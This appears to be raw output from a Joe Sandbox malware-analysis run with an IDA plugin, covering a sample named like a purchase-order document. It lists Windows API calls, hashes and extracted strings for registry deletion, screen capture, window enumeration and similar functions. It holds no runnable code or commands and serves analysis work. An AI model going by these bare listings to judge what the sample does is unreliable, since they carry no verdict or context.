                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                    • String ID:
                                                                                    • API String ID: 3840717409-0
                                                                                    • Opcode ID: 080598317d0fcfb8a3202022fa3a954ea1405efb9724e3d3e4b25533c00f6317
                                                                                    • Instruction ID: f09034faf4d2a7d03eeca9e609346f2c0cdb198d0126c658757514b192e55805
                                                                                    • Opcode Fuzzy Hash: 080598317d0fcfb8a3202022fa3a954ea1405efb9724e3d3e4b25533c00f6317
                                                                                    • Instruction Fuzzy Hash: 5B412875602209AFDB119FA5DC48EAE7BBCFF89B11F10855AF909E7260DB309941CB60
                                                                                    APIs
                                                                                    • VariantInit.OLEAUT32(00000000), ref: 001B1502
                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 001B150B
                                                                                    • VariantClear.OLEAUT32(?), ref: 001B1517
                                                                                    • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 001B15FB
                                                                                    • VarR8FromDec.OLEAUT32(?,?), ref: 001B1657
                                                                                    • VariantInit.OLEAUT32(?), ref: 001B1708
                                                                                    • SysFreeString.OLEAUT32(?), ref: 001B178C
                                                                                    • VariantClear.OLEAUT32(?), ref: 001B17D8
                                                                                    • VariantClear.OLEAUT32(?), ref: 001B17E7
                                                                                    • VariantInit.OLEAUT32(00000000), ref: 001B1823
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                    • API String ID: 1234038744-3931177956
                                                                                    • Opcode ID: b7a230f9c21207b6779111b6f8f703238098c65d7f462746ebab8a3c14a603b6
                                                                                    • Instruction ID: 68bca7cc80ced9700bdff747a8c219ee6b2508515bf7d0b4f679b34992a00d6c
                                                                                    • Opcode Fuzzy Hash: b7a230f9c21207b6779111b6f8f703238098c65d7f462746ebab8a3c14a603b6
                                                                                    • Instruction Fuzzy Hash: 62D13432A00115FBCB249F64E8A4BBDB7B5BF46700F92855AF807AB190DB30DC45DBA1
                                                                                    APIs
                                                                                      • Part of subcall function 00149CB3: _wcslen.LIBCMT ref: 00149CBD
                                                                                      • Part of subcall function 001CC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001CB6AE,?,?), ref: 001CC9B5
                                                                                      • Part of subcall function 001CC998: _wcslen.LIBCMT ref: 001CC9F1
                                                                                      • Part of subcall function 001CC998: _wcslen.LIBCMT ref: 001CCA68
                                                                                      • Part of subcall function 001CC998: _wcslen.LIBCMT ref: 001CCA9E
                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001CB6F4
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001CB772
                                                                                    • RegDeleteValueW.ADVAPI32(?,?), ref: 001CB80A
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 001CB87E
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 001CB89C
                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 001CB8F2
                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 001CB904
                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 001CB922
                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 001CB983
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 001CB994
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                    • API String ID: 146587525-4033151799
                                                                                    • Opcode ID: 944e0fdffabef4fd2f09033906e8ec9debaa29addb65418944ac755170e5630a
                                                                                    • Instruction ID: 8fe7c3fbcfe01bb175dfa5f10e61d8d01453aec19142123bc0919ef08619ef2d
                                                                                    • Opcode Fuzzy Hash: 944e0fdffabef4fd2f09033906e8ec9debaa29addb65418944ac755170e5630a
                                                                                    • Instruction Fuzzy Hash: 4AC18B74209242AFD714DF24C4D6F2ABBE5BF94308F14855CF49A8B6A2CB35EC45CB92
                                                                                    APIs
                                                                                    • GetDC.USER32(00000000), ref: 001C25D8
                                                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 001C25E8
                                                                                    • CreateCompatibleDC.GDI32(?), ref: 001C25F4
                                                                                    • SelectObject.GDI32(00000000,?), ref: 001C2601
                                                                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 001C266D
                                                                                    • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 001C26AC
                                                                                    • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 001C26D0
                                                                                    • SelectObject.GDI32(?,?), ref: 001C26D8
                                                                                    • DeleteObject.GDI32(?), ref: 001C26E1
                                                                                    • DeleteDC.GDI32(?), ref: 001C26E8
                                                                                    • ReleaseDC.USER32(00000000,?), ref: 001C26F3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                    • String ID: (
                                                                                    • API String ID: 2598888154-3887548279
                                                                                    • Opcode ID: f0c72bb9e836feebfc9b751834932eb8969d0e5cf1c0ec7fa58eb45e266ae40a
                                                                                    • Instruction ID: f13369aef1000663faad6eb001887ca5169d2309c974f12f2472f2ca0242da36
                                                                                    • Opcode Fuzzy Hash: f0c72bb9e836feebfc9b751834932eb8969d0e5cf1c0ec7fa58eb45e266ae40a
                                                                                    • Instruction Fuzzy Hash: AE61F5B5D0121AEFCF04CFA4D885EAEBBB6FF58310F20851AE955A7250D770A941CFA0
                                                                                    APIs
                                                                                    • ___free_lconv_mon.LIBCMT ref: 0017DAA1
                                                                                      • Part of subcall function 0017D63C: _free.LIBCMT ref: 0017D659
                                                                                      • Part of subcall function 0017D63C: _free.LIBCMT ref: 0017D66B
                                                                                      • Part of subcall function 0017D63C: _free.LIBCMT ref: 0017D67D
                                                                                      • Part of subcall function 0017D63C: _free.LIBCMT ref: 0017D68F
                                                                                      • Part of subcall function 0017D63C: _free.LIBCMT ref: 0017D6A1
                                                                                      • Part of subcall function 0017D63C: _free.LIBCMT ref: 0017D6B3
                                                                                      • Part of subcall function 0017D63C: _free.LIBCMT ref: 0017D6C5
                                                                                      • Part of subcall function 0017D63C: _free.LIBCMT ref: 0017D6D7
                                                                                      • Part of subcall function 0017D63C: _free.LIBCMT ref: 0017D6E9
                                                                                      • Part of subcall function 0017D63C: _free.LIBCMT ref: 0017D6FB
                                                                                      • Part of subcall function 0017D63C: _free.LIBCMT ref: 0017D70D
                                                                                      • Part of subcall function 0017D63C: _free.LIBCMT ref: 0017D71F
                                                                                      • Part of subcall function 0017D63C: _free.LIBCMT ref: 0017D731
                                                                                    • _free.LIBCMT ref: 0017DA96
                                                                                      • Part of subcall function 001729C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0017D7D1,00000000,00000000,00000000,00000000,?,0017D7F8,00000000,00000007,00000000,?,0017DBF5,00000000), ref: 001729DE
                                                                                      • Part of subcall function 001729C8: GetLastError.KERNEL32(00000000,?,0017D7D1,00000000,00000000,00000000,00000000,?,0017D7F8,00000000,00000007,00000000,?,0017DBF5,00000000,00000000), ref: 001729F0
                                                                                    • _free.LIBCMT ref: 0017DAB8
                                                                                    • _free.LIBCMT ref: 0017DACD
                                                                                    • _free.LIBCMT ref: 0017DAD8
                                                                                    • _free.LIBCMT ref: 0017DAFA
                                                                                    • _free.LIBCMT ref: 0017DB0D
                                                                                    • _free.LIBCMT ref: 0017DB1B
                                                                                    • _free.LIBCMT ref: 0017DB26
                                                                                    • _free.LIBCMT ref: 0017DB5E
                                                                                    • _free.LIBCMT ref: 0017DB65
                                                                                    • _free.LIBCMT ref: 0017DB82
                                                                                    • _free.LIBCMT ref: 0017DB9A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                    • String ID:
                                                                                    • API String ID: 161543041-0
                                                                                    • Opcode ID: 98f2aa1a43219c7336b0de4df0921821873494bf3b3b19de7ca5c6d449403593
                                                                                    • Instruction ID: 7b9efbe9b04109fc280035a91de74810e8c9aba553ea0c598b984e48c38ca2a8
                                                                                    • Opcode Fuzzy Hash: 98f2aa1a43219c7336b0de4df0921821873494bf3b3b19de7ca5c6d449403593
                                                                                    • Instruction Fuzzy Hash: 9B3149316443099FEB22AA39E845B5AB7F9FF21314F19C829E54DD7192DF31AC818B20
                                                                                    APIs
                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 001A369C
                                                                                    • _wcslen.LIBCMT ref: 001A36A7
                                                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 001A3797
                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 001A380C
                                                                                    • GetDlgCtrlID.USER32(?), ref: 001A385D
                                                                                    • GetWindowRect.USER32(?,?), ref: 001A3882
                                                                                    • GetParent.USER32(?), ref: 001A38A0
                                                                                    • ScreenToClient.USER32(00000000), ref: 001A38A7
                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 001A3921
                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 001A395D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                                    • String ID: %s%u
                                                                                    • API String ID: 4010501982-679674701
                                                                                    • Opcode ID: 632904540a9068aa8cb6cee4675c1eb77f269bf5f5bcc743b9d63613cf864f32
                                                                                    • Instruction ID: e9b5639df3517ff68d589fe50cddbaa4ecdd23c3471967bf91d4ab22bd805e97
                                                                                    • Opcode Fuzzy Hash: 632904540a9068aa8cb6cee4675c1eb77f269bf5f5bcc743b9d63613cf864f32
                                                                                    • Instruction Fuzzy Hash: 1091E175204606AFDB08DF24C885BEBF7A8FF45354F008629F9A9C2190DB34EA56CBD1
                                                                                    APIs
                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 001A4994
                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 001A49DA
                                                                                    • _wcslen.LIBCMT ref: 001A49EB
                                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 001A49F7
                                                                                    • _wcsstr.LIBVCRUNTIME ref: 001A4A2C
                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 001A4A64
                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 001A4A9D
                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 001A4AE6
                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 001A4B20
                                                                                    • GetWindowRect.USER32(?,?), ref: 001A4B8B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                    • String ID: ThumbnailClass
                                                                                    • API String ID: 1311036022-1241985126
                                                                                    • Opcode ID: 7d6a1eef1f810d9ffba84a5a4239e829b49069a4cc6d9cc7d932691d3508cd6f
                                                                                    • Instruction ID: 58322c7d11103d0711d77a880469cfcd63b3d6cfec0694e83462098b75d76033
                                                                                    • Opcode Fuzzy Hash: 7d6a1eef1f810d9ffba84a5a4239e829b49069a4cc6d9cc7d932691d3508cd6f
                                                                                    • Instruction Fuzzy Hash: DF91DF750052069FDB04CF14C981BABB7E8FFD6314F04846AFD8A9A196DBB0ED45CBA1
                                                                                    APIs
                                                                                      • Part of subcall function 00159BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00159BB2
                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 001D8D5A
                                                                                    • GetFocus.USER32 ref: 001D8D6A
                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 001D8D75
                                                                                    • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 001D8E1D
                                                                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 001D8ECF
                                                                                    • GetMenuItemCount.USER32(?), ref: 001D8EEC
                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 001D8EFC
                                                                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 001D8F2E
                                                                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 001D8F70
                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 001D8FA1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                    • String ID: 0
                                                                                    • API String ID: 1026556194-4108050209
                                                                                    • Opcode ID: a3eb02b1eac88bd208cb3523a3bbb43dad184f6098f44d085a9a39b50e7c68a1
                                                                                    • Instruction ID: 23463da81f8931dc156315b0871799ccfa40e1521e78107108bcea3af31f9c0a
                                                                                    • Opcode Fuzzy Hash: a3eb02b1eac88bd208cb3523a3bbb43dad184f6098f44d085a9a39b50e7c68a1
                                                                                    • Instruction Fuzzy Hash: E381BF715093019FDB10CF28D884AABBBE9FB98714F040A1EF99497391DB30D941CFA1
                                                                                    APIs
                                                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 001ADC20
                                                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 001ADC46
                                                                                    • _wcslen.LIBCMT ref: 001ADC50
                                                                                    • _wcsstr.LIBVCRUNTIME ref: 001ADCA0
                                                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 001ADCBC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                    • API String ID: 1939486746-1459072770
                                                                                    • Opcode ID: 013890414dfa2fff69414e1048668836f9f7855596fc1b45a7665e76dd3744c1
                                                                                    • Instruction ID: 715c0f0eaf5469a0c5d93daa8c392f970b41fee11b2aca620f927bae4fc82766
                                                                                    • Opcode Fuzzy Hash: 013890414dfa2fff69414e1048668836f9f7855596fc1b45a7665e76dd3744c1
                                                                                    • Instruction Fuzzy Hash: E4413672A40701BBDB04A7B0AC07EFF376CEF66750F10046AF901EA1C2EB349921C6A4
                                                                                    APIs
                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 001CCC64
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 001CCC8D
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 001CCD48
                                                                                      • Part of subcall function 001CCC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001CCCAA
                                                                                      • Part of subcall function 001CCC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 001CCCBD
                                                                                      • Part of subcall function 001CCC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 001CCCCF
                                                                                      • Part of subcall function 001CCC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 001CCD05
                                                                                      • Part of subcall function 001CCC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 001CCD28
                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 001CCCF3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                    • API String ID: 2734957052-4033151799
                                                                                    • Opcode ID: b5434ceec3ffda0fda00843b06c15c43b9c7fcce23f2e1348d1a3b013f976004
                                                                                    • Instruction ID: f54b1251e240d253922d8936e4a9663c01c57f7f7837a23feadc0fb6efce0591
                                                                                    • Opcode Fuzzy Hash: b5434ceec3ffda0fda00843b06c15c43b9c7fcce23f2e1348d1a3b013f976004
                                                                                    • Instruction Fuzzy Hash: 3E31617590212ABBDB208B94DC88EFFBB7CEF65750F004569F90AE2141DB349E45DAE0
                                                                                    APIs
                                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 001B3D40
                                                                                    • _wcslen.LIBCMT ref: 001B3D6D
                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 001B3D9D
                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 001B3DBE
                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 001B3DCE
                                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 001B3E55
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 001B3E60
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 001B3E6B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                    • String ID: :$\$\??\%s
                                                                                    • API String ID: 1149970189-3457252023
                                                                                    • Opcode ID: 078ab2578a45c6343341f68818bcf660264b69e07f8d047ade6d6d25d8c09e26
                                                                                    • Instruction ID: 333c96ba2a49c211d63fb208b7de5fea9c79ffa71054090bf8c6057cb0694ff2
                                                                                    • Opcode Fuzzy Hash: 078ab2578a45c6343341f68818bcf660264b69e07f8d047ade6d6d25d8c09e26
                                                                                    • Instruction Fuzzy Hash: B131B27694021AABDB209BA0DC49FEF37BDEF89700F5041B6F615D6060EB709794CB64
                                                                                    APIs
                                                                                    • timeGetTime.WINMM ref: 001AE6B4
                                                                                      • Part of subcall function 0015E551: timeGetTime.WINMM(?,?,001AE6D4), ref: 0015E555
                                                                                    • Sleep.KERNEL32(0000000A), ref: 001AE6E1
                                                                                    • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 001AE705
                                                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 001AE727
                                                                                    • SetActiveWindow.USER32 ref: 001AE746
                                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 001AE754
                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 001AE773
                                                                                    • Sleep.KERNEL32(000000FA), ref: 001AE77E
                                                                                    • IsWindow.USER32 ref: 001AE78A
                                                                                    • EndDialog.USER32(00000000), ref: 001AE79B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                    • String ID: BUTTON
                                                                                    • API String ID: 1194449130-3405671355
                                                                                    • Opcode ID: b1a64ba9812b3706cd0d254baf8531534466f5632b3eb4c095ad2ee516e94760
                                                                                    • Instruction ID: 4f33a7f7e355f7da48044469011f4a819e4941f64c094b077b30ea0de6a3ca1e
                                                                                    • Opcode Fuzzy Hash: b1a64ba9812b3706cd0d254baf8531534466f5632b3eb4c095ad2ee516e94760
                                                                                    • Instruction Fuzzy Hash: FE21A478301255EFEB005FA0FC8DB653BADF7A6348F004826F915825E1DF71AC64CAA4
                                                                                    APIs
                                                                                      • Part of subcall function 00149CB3: _wcslen.LIBCMT ref: 00149CBD
                                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 001AEA5D
                                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 001AEA73
                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001AEA84
                                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 001AEA96
                                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 001AEAA7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
